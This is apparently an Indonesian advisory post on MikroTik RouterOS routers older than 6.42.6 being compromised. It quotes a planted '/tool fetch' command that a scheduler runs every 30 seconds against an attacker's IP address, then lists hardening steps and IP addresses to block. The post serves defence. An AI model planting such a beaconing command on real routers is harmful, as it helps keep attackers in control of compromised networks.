org yg iseng ini melakukan exploid dari IP 95.154.216.151
setelah berhasil masuk, kemudian menambahkan script dengan isi sebagai berikut
/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no
script ini di buat scheduler setiap 30 detik melakukan fetch ke ip 95.154.216.167
hal ini terjadi karena celah di mikrotik seri sebelum versi 6.42.6
langkah-langkah pencegahan
- ganti password
- setting user admin hanya bisa diakses dari ip lokal saja
- buat user lain (selain admin) untuk di akses dari luar (akan lebih baik jika di tambahkan available from ip….)
- ganti port winbox 8291 dengan port yang lain (ini untuk menghambat proses exploid, krn si cracker akan mencoba mencari port lain jika port ini diganti)
- upgrade ke versi OS ke seri yg lebih baru
- lakukan pemblokiran dari ip ip berikut – 95.154.216.160, 95.154.216.167, 95.154.216.151, 95.154.216.163,
korban-korban berjatuhan
sumber
- proof of concept (POC) -> https://youtu.be/pBNIrgAg-a8
- https://forum.mikrotik.com/viewtopic.php?t=133533
- bug mikrotik – https://www.cvedetails.com/vulnerability-list/vendor_id-12508/product_id-23641/Mikrotik-Routeros.html
- zero day – https://www.bleepingcomputer.com/news/security/mikrotik-patches-zero-day-flaw-under-attack-in-record-time/